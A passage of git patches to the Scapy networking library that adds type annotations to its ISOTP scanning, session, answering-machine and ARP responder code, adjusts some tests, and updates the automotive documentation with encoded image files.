extended_can_id=False, - verbose=False): +def ISOTPScan(sock, # type: SuperSocket + scan_range=range(0x7ff + 1), # type: Iterable[int] + extended_addressing=False, # type: bool + extended_scan_range=range(0x100), # type: Iterable[int] + noise_listen_time=2, # type: int + sniff_time=0.1, # type: float + output_format=None, # type: Optional[str] + can_interface=None, # type: Optional[str] + extended_can_id=False, # type: bool + verbose=False # type: bool + ): + # type: (...) -> Union[str, List[SuperSocket]] """Scan for ISOTP Sockets on a bus and return findings Scan for ISOTP Sockets in the defined range and returns found sockets @@ -2175,13 +2355,12 @@ def ISOTPScan(sock, if output_format == "text": return generate_text_output(found_packets, extended_addressing) + if output_format == "code": return generate_code_output(found_packets, can_interface, extended_addressing) - if can_interface is None: - can_interface = sock - return generate_isotp_list(found_packets, can_interface, + return generate_isotp_list(found_packets, can_interface or sock, extended_addressing) @@ -2230,9 +2409,9 @@ def generate_text_output(found_packets, extended_addressing=False): return text -def generate_code_output(found_packets, can_interface, +def generate_code_output(found_packets, can_interface="iface", extended_addressing=False): - # type: (Dict[int, Tuple[Packet, int]], str, bool) -> str + # type: (Dict[int, Tuple[Packet, int]], Optional[str], bool) -> str """Generate a copy&past-able output from the result of the `scan` or the `scan_extended` function. @@ -2275,9 +2454,11 @@ def generate_code_output(found_packets, can_interface, return header + result -def generate_isotp_list(found_packets, can_interface, - extended_addressing=False): - # type: (Dict[int, Tuple[Packet, int]], str, bool) -> List[ISOTPSocket] +def generate_isotp_list(found_packets, # type: Dict[int, Tuple[Packet, int]] + can_interface, # type: Union[SuperSocket, str] + extended_addressing=False # type: bool + ): + # type: (...) -> List[SuperSocket] """Generate a list of ISOTPSocket objects from the result of the `scan` or the `scan_extended` function. @@ -2288,7 +2469,7 @@ def generate_isotp_list(found_packets, can_interface, extended addressing :return: A list of all found ISOTPSockets """ - socket_list = [] # type: List[ISOTPSocket] + socket_list = [] # type: List[SuperSocket] for pack in found_packets: pkt = found_packets[pack][0] diff --git a/scapy/fields.py b/scapy/fields.py index d8de2d1ba11..ed6d3195248 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -2135,7 +2135,7 @@ class TestPacket(Packet): def __init__(self, name, default, size, tot_size=0, end_tot_size=0): - # type: (str, I, int, int, int) -> None + # type: (str, Optional[I], int, int, int) -> None Field.__init__(self, name, default) if callable(size): size = size(self) @@ -2237,7 +2237,7 @@ class BitFixedLenField(BitField): def __init__(self, name, # type: str - default, # type: int + default, # type: Optional[int] length_from # type: Callable[[Packet], int] ): # type: (...) -> None @@ -2267,7 +2267,7 @@ class BitFieldLenField(BitField): def __init__(self, name, # type: str - default, # type: int + default, # type: Optional[int] size, # type: int length_of=None, # type: Optional[Union[Callable[[Optional[Packet]], int], str]] # noqa: E501 count_of=None, # type: Optional[str] diff --git a/scapy/sessions.py b/scapy/sessions.py index 2a9cc1457aa..ff66f9f1cef 100644 --- a/scapy/sessions.py +++ b/scapy/sessions.py @@ -97,10 +97,8 @@ def on_packet_received(self, pkt): """ if not pkt: return - if isinstance(pkt, list): - for p in pkt: - DefaultSession.on_packet_received(self, p) - return + if not isinstance(pkt, Packet): + raise TypeError("Only provide a Packet.") self.__count += 1 if self.store: self.lst.append(pkt) @@ -153,10 +151,7 @@ def on_packet_received(self, pkt): # type: (Optional[Packet]) -> None if not pkt: return None - DefaultSession.on_packet_received( - self, - self._ip_process_packet(pkt) - ) + super(IPSession, self).on_packet_received(self._ip_process_packet(pkt)) class StringBuffer(object): diff --git a/test/contrib/automotive/uds_utils.uts b/test/contrib/automotive/uds_utils.uts index b3c98d6bb1f..42c301bf87c 100644 --- a/test/contrib/automotive/uds_utils.uts +++ b/test/contrib/automotive/uds_utils.uts @@ -24,7 +24,7 @@ load_contrib("automotive.uds", globals_dict=globals()) drain_bus(iface0) drain_bus(iface1) -packet = ISOTP('Request') +packet = ISOTP(b'Request') succ = False with new_can_socket0() as isocan1, ISOTPSocket(isocan1, sid=0x241, did=0x641, basecls=UDS) as sendSock, \ @@ -51,7 +51,7 @@ assert succ drain_bus(iface0) drain_bus(iface1) -packet = ISOTP('Request') +packet = ISOTP(b'Request') succ = False with new_can_socket0() as isocan1, ISOTPSocket(isocan1, sid=0x241, did=0x641, basecls=UDS) as sendSock, \ diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts index 13346c6f321..5d82605a8a7 100644 --- a/test/contrib/isotp.uts +++ b/test/contrib/isotp.uts @@ -944,7 +944,7 @@ assert(not impl.rx_thread.is_alive()) = Test on_recv function with single frame with ISOTPSocket(MockCANSocket(), sid=0x641, did=0x241) as s: s.ins.on_recv(CAN(identifier=0x241, data=dhex("05 01 02 03 04 05"))) - msg = s.ins.rx_queue.get(True, 1) + msg, ts = s.ins.rx_queue.get(True, 1) assert(msg == dhex("01 02 03 04 05")) = Test on_recv function with empty frame @@ -954,9 +954,11 @@ with ISOTPSocket(MockCANSocket(), sid=0x641, did=0x241) as s: = Test on_recv function with single frame and extended addressing with ISOTPSocket(MockCANSocket(), sid=0x641, did=0x241, extended_rx_addr=0xea) as s: - s.ins.on_recv(CAN(identifier=0x241, data=dhex("EA 05 01 02 03 04 05"))) - msg = s.ins.rx_queue.get(True, 1) + cf = CAN(identifier=0x241, data=dhex("EA 05 01 02 03 04 05")) + s.ins.on_recv(cf) + msg, ts = s.ins.rx_queue.get(True, 1) assert(msg == dhex("01 02 03 04 05")) + assert ts == cf.time = CF is sent when first frame is received cans = MockCANSocket() From d0874deef243744e9ef263bd778d09b4fae60b7a Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 22 Apr 2021 11:11:08 +0200 Subject: [PATCH 0563/1632] Typing of Answeringmachine (#3144) --- .config/mypy/mypy_enabled.txt | 1 + scapy/ansmachine.py | 72 +++++++++++++++++++++++++-------- scapy/contrib/automotive/ecu.py | 20 ++++----- scapy/layers/l2.py | 10 ++--- 4 files changed, 73 insertions(+), 30 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 5c79289b8df..a89f783f21f 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -10,6 +10,7 @@ scapy/arch/__init__.py scapy/arch/common.py scapy/arch/linux.py scapy/arch/unix.py +scapy/ansmachine.py scapy/asn1/mib.py scapy/base_classes.py scapy/compat.py diff --git a/scapy/ansmachine.py b/scapy/ansmachine.py index 229b139e5a6..d45e0dd480f 100644 --- a/scapy/ansmachine.py +++ b/scapy/ansmachine.py @@ -18,51 +18,77 @@ from scapy.config import conf from scapy.sendrecv import send, sniff +from scapy.packet import Packet +from scapy.plist import PacketList import scapy.modules.six as six +from scapy.compat import ( + Any, + Dict, + Generic, + _Generic_metaclass, + Optional, + Tuple, + Type, + TypeVar, +) + +_T = TypeVar("_T", Packet, PacketList) + class ReferenceAM(type): - def __new__(cls, name, bases, dct): + def __new__(cls, # type: ignore + name, # type: str + bases, # type: Tuple[type, ...] + dct # type: Dict[str, Any] + ): + # type: (...) -> Type['AnsweringMachine[_T]'] obj = super(ReferenceAM, cls).__new__(cls, name, bases, dct) - if obj.function_name: - globals()[obj.function_name] = lambda obj=obj, *args, **kargs: obj(*args, **kargs)() # noqa: E501 + if obj.function_name: # type: ignore + globals()[obj.function_name] = lambda obj=obj, *args, **kargs: obj(*args, **kargs)() # type: ignore # noqa: E501 return obj -class AnsweringMachine(six.with_metaclass(ReferenceAM, object)): +@six.add_metaclass(_Generic_metaclass) +@six.add_metaclass(ReferenceAM) +class AnsweringMachine(Generic[_T]): function_name = "" - filter = None - sniff_options = {"store": 0} + filter = None # type: Optional[str] + sniff_options = {"store": 0} # type: Dict[str, Any] sniff_options_list = ["store", "iface", "count", "promisc", "filter", "type", "prn", "stop_filter", "opened_socket"] - send_options = {"verbose": 0} + send_options = {"verbose": 0} # type: Dict[str, Any] send_options_list = ["iface", "inter", "loop", "verbose", "socket"] send_function = staticmethod(send) def __init__(self, **kargs): + # type: (Any) -> None self.mode = 0 self.verbose = kargs.get("verbose", conf.verb >= 0) if self.filter: kargs.setdefault("filter", self.filter) kargs.setdefault("prn", self.reply) - self.optam1 = {} - self.optam2 = {} - self.optam0 = {} + self.optam1 = {} # type: Dict[str, Any] + self.optam2 = {} # type: Dict[str, Any] + self.optam0 = {} # type: Dict[str, Any] doptsend, doptsniff = self.parse_all_options(1, kargs) self.defoptsend = self.send_options.copy() self.defoptsend.update(doptsend) self.defoptsniff = self.sniff_options.copy() self.defoptsniff.update(doptsniff) - self.optsend, self.optsniff = [{}, {}] + self.optsend = {} # type: Dict[str, Any] + self.optsniff = {} # type: Dict[str, Any] def __getattr__(self, attr): + # type: (str) -> Any for dct in [self.optam2, self.optam1]: if attr in dct: return dct[attr] raise AttributeError(attr) def __setattr__(self, attr, val): + # type: (str, Any) -> None mode = self.__dict__.get("mode", 0) if mode == 0: self.__dict__[attr] = val @@ -70,11 +96,13 @@ def __setattr__(self, attr, val): [self.optam1, self.optam2][mode - 1][attr] = val def parse_options(self): + # type: () -> None pass def parse_all_options(self, mode, kargs): - sniffopt = {} - sendopt = {} + # type: (int, Any) -> Tuple[Dict[str, Any], Dict[str, Any]] + sniffopt = {} # type: Dict[str, Any] + sendopt = {} # type: Dict[str, Any] for k in list(kargs): # use list(): kargs is modified in the loop if k in self.sniff_options_list: sniffopt[k] = kargs[k] @@ -88,27 +116,36 @@ def parse_all_options(self, mode, kargs): elif mode == 2 and kargs: k = self.optam0.copy() k.update(kargs) - self.parse_options(**k) + self.parse_options(**k) # type: ignore kargs = k omode = self.__dict__.get("mode", 0) self.__dict__["mode"] = mode - self.parse_options(**kargs) + self.parse_options(**kargs) # type: ignore self.__dict__["mode"] = omode return sendopt, sniffopt def is_request(self, req): + # type: (Packet) -> int return 1 def make_reply(self, req): + # type: (Packet) -> _T return req def send_reply(self, reply): + # type: (_T) -> None self.send_function(reply, **self.optsend) def print_reply(self, req, reply): - print("%s ==> %s" % (req.summary(), reply.summary())) + # type: (Packet, _T) -> None + if isinstance(reply, PacketList): + print("%s ==> %s" % (req.summary(), + [res.summary() for res in reply])) + else: + print("%s ==> %s" % (req.summary(), reply.summary())) def reply(self, pkt): + # type: (Packet) -> None if not self.is_request(pkt): return reply = self.make_reply(pkt) @@ -117,6 +154,7 @@ def reply(self, pkt): self.print_reply(pkt, reply) def run(self, *args, **kargs): + # type: (Any, Any) -> None warnings.warn( "run() method deprecated. The instance is now callable", DeprecationWarning @@ -124,6 +162,7 @@ def run(self, *args, **kargs): self(*args, **kargs) def __call__(self, *args, **kargs): + # type: (Any, Any) -> None optsend, optsniff = self.parse_all_options(2, kargs) self.optsend = self.defoptsend.copy() self.optsend.update(optsend) @@ -136,4 +175,5 @@ def __call__(self, *args, **kargs): print("Interrupted by user") def sniff(self): + # type: () -> None sniff(**self.optsniff) diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index e8eab1c7d42..7fabf705c39 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -556,7 +556,7 @@ def command(self): conf.contribs['EcuAnsweringMachine'] = {'send_delay': 0} -class EcuAnsweringMachine(AnsweringMachine): +class EcuAnsweringMachine(AnsweringMachine[PacketList]): """AnsweringMachine which emulates the basic behaviour of a real world ECU. Provide a list of ``EcuResponse`` objects to configure the behaviour of a AnsweringMachine. @@ -572,10 +572,16 @@ class EcuAnsweringMachine(AnsweringMachine): sniff_options_list = ["store", "opened_socket", "count", "filter", "prn", "stop_filter", "timeout"] - def parse_options(self, supported_responses=None, - main_socket=None, broadcast_socket=None, basecls=Raw, - timeout=None, initial_ecu_state=None): - # type: (Optional[List[EcuResponse]], Optional[SuperSocket], Optional[SuperSocket], Type[Packet], Optional[Union[int, float]], Optional[EcuState]) -> None # noqa: E501 + def parse_options( + self, + supported_responses=None, # type: Optional[List[EcuResponse]] + main_socket=None, # type: Optional[SuperSocket] + broadcast_socket=None, # type: Optional[SuperSocket] + basecls=Raw, # type: Type[Packet] + timeout=None, # type: Optional[Union[int, float]] + initial_ecu_state=None # type: Optional[EcuState] + ): + # type: (...) -> None """ :param supported_responses: List of ``EcuResponse`` objects to define the behaviour. The default response is @@ -616,10 +622,6 @@ def is_request(self, req): # type: (Packet) -> bool return isinstance(req, self.__basecls) - def print_reply(self, req, reply): - # type: (Packet, PacketList) -> None - print("%s ==> %s" % (req.summary(), [res.summary() for res in reply])) - def make_reply(self, req): # type: (Packet) -> PacketList """ diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index b1224208f9d..47957f73926 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -772,7 +772,7 @@ def promiscping(net, timeout=2, fake_bcast="ff:ff:ff:ff:ff:fe", **kargs): return ans, unans -class ARP_am(AnsweringMachine): +class ARP_am(AnsweringMachine[Packet]): """Fake ARP Relay Daemon (farpd) example: @@ -817,12 +817,12 @@ def is_request(self, req): (self.IP_addr is None or self.IP_addr == arp.pdst) # noqa: E501 def make_reply(self, req): - # type: (Ether) -> Ether + # type: (Packet) -> Packet ether = req[Ether] arp = req[ARP] if 'iface' in self.optsend: - iff = self.optsend.get('iface') + iff = cast(Union[NetworkInterface, str], self.optsend.get('iface')) else: iff, a, gw = conf.route.route(arp.psrc) self.iff = iff @@ -842,14 +842,14 @@ def make_reply(self, req): return resp def send_reply(self, reply): - # type: (ARP) -> None + # type: (Packet) -> None if 'iface' in self.optsend: self.send_function(reply, **self.optsend) else: self.send_function(reply, iface=self.iff, **self.optsend) def print_reply(self, req, reply): - # type: (Ether, Ether) -> None + # type: (Packet, Packet) -> None print("%s ==> %s on %s" % (req.summary(), reply.summary(), self.iff)) From cc34f80156d65078137234bcc4c1a14dbe11eb7a Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 22 Apr 2021 11:16:39 +0200 Subject: [PATCH 0564/1632] Update Automotive-specific documentation (#3167) * Update Automotive-specific documentation. Fixes #3141 * apply feedback * add myself to Credits --- doc/scapy/backmatter.rst | 1 + doc/scapy/conf.py | 3 + .../graphics/automotive/CAN-full-frame.jpg | Bin 0 -> 62925 bytes .../graphics/automotive/DC-ZGW-CAN-Bus-.png | Bin 0 -> 104854 bytes .../graphics/automotive/Simple-CAN-Bus-.png | Bin 0 -> 40712 bytes .../graphics/automotive/XCP_ReferenceBook.png | Bin 0 -> 59488 bytes .../graphics/automotive/ZGW-CAN-Bus-.png | Bin 0 -> 62113 bytes .../graphics/automotive/can-bus-states.png | Bin 0 -> 132143 bytes .../automotive/can-frame-socket-can.png | Bin 0 -> 14310 bytes doc/scapy/graphics/automotive/diag-stack.png | Bin 0 -> 44140 bytes doc/scapy/graphics/automotive/isotp-flow.png | Bin 0 -> 21686 bytes .../graphics/automotive/isotp-frames.png | Bin 0 -> 38543 bytes doc/scapy/layers/automotive.rst | 1104 ++++++++--------- 13 files changed, 537 insertions(+), 571 deletions(-) create mode 100644 doc/scapy/graphics/automotive/CAN-full-frame.jpg create mode 100644 doc/scapy/graphics/automotive/DC-ZGW-CAN-Bus-.png create mode 100644 doc/scapy/graphics/automotive/Simple-CAN-Bus-.png create mode 100644 doc/scapy/graphics/automotive/XCP_ReferenceBook.png create mode 100644 doc/scapy/graphics/automotive/ZGW-CAN-Bus-.png create mode 100644 doc/scapy/graphics/automotive/can-bus-states.png create mode 100644 doc/scapy/graphics/automotive/can-frame-socket-can.png create mode 100644 doc/scapy/graphics/automotive/diag-stack.png create mode 100644 doc/scapy/graphics/automotive/isotp-flow.png create mode 100644 doc/scapy/graphics/automotive/isotp-frames.png diff --git a/doc/scapy/backmatter.rst b/doc/scapy/backmatter.rst index f316bb2a879..326083045e4 100644 --- a/doc/scapy/backmatter.rst +++ b/doc/scapy/backmatter.rst @@ -8,3 +8,4 @@ Credits - Fred Raynal wrote the chapter on building and dissecting packets. - Peter Kacherginsky contributed several tutorial sections, one-liners and recipes. - Dirk Loss integrated and restructured the existing docs to make this book. +- Nils Weiss contributed automotive specific layers and utilities. diff --git a/doc/scapy/conf.py b/doc/scapy/conf.py index 981e8f0072f..33c4615ba8d 100644 --- a/doc/scapy/conf.py +++ b/doc/scapy/conf.py @@ -97,6 +97,9 @@ # If true, `todo` and `todoList` produce output, else they produce nothing. todo_include_todos = False +# Enable codeauthor and sectionauthor directives +show_authors = True + # -- Options for HTML output ---------------------------------------------- diff --git a/doc/scapy/graphics/automotive/CAN-full-frame.jpg b/doc/scapy/graphics/automotive/CAN-full-frame.jpg new file mode 100644 index 0000000000000000000000000000000000000000..d726b3b5c7c943f2af13efdbefcbd87388d26e36 GIT binary patch literal 62925 zcmd3O2|Sc-+xL{D5=xe=BNQc3$ZjejiOIg3A_>W!-4r3~WQnX(A-gGS*2zwios4Ce zAzLzI9nA7wy6?Mtd*1hZ?&p1f-|w4LI$h^^9{ce>j`O^teW6W)j$BvQR0r+Z0|M;< zet~FIkfN%d+GPW%o`Qhg9dQR2TRVY==g&zBhmREg6Q_{-TeYS`+zU{1N8L!_R$|=VAy})@S($p84ocsGBL9r zVPZbY%*c3zMed-eh}?q@h~@DL;LK=~2S-aT}5d-u`p zQVl#E0Q?-Z?VDqud1nQT+_U+Z(wL-Y+`C=bI10s-938;cMs2pUfw>w!B0X$!=8pm z#Kk8(PfU7|oboy|EBj4OZeD&#X<2zi<@>7Y#-`?$*0%PJkA3|EgG0k#Mle%2{PfJ% z*}3@z;>zmU`o<<{YkQZkJs`SY*aH6ig|WZzbrj%h@4kI>`xtil+OyXS_)T|oAN`5* z`&lpRGTe4OCV1iT0k$i#uiiBr6q3>-uv@$J9^w#|o;pd~W$g!N{~lvO{}E?D8T*|t z4CpZ39zc0?M?nw}MORv{@8%vgwquu=;tWEx6!S%?r{vgKHllOL7g3)W5{!BE`lkp@P zi037X8nw5K214e-mnSoK)cdJ{uV^52Q0*d>D{^v~!V05{=cdr9o}@_pN|H5 ztu^UPKJ^Vv8VCQCl}r4Qlx%wh=@*%0D*#HQr~*o)_v!u{lf5+1;TD1yHC*B`nvhyT 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 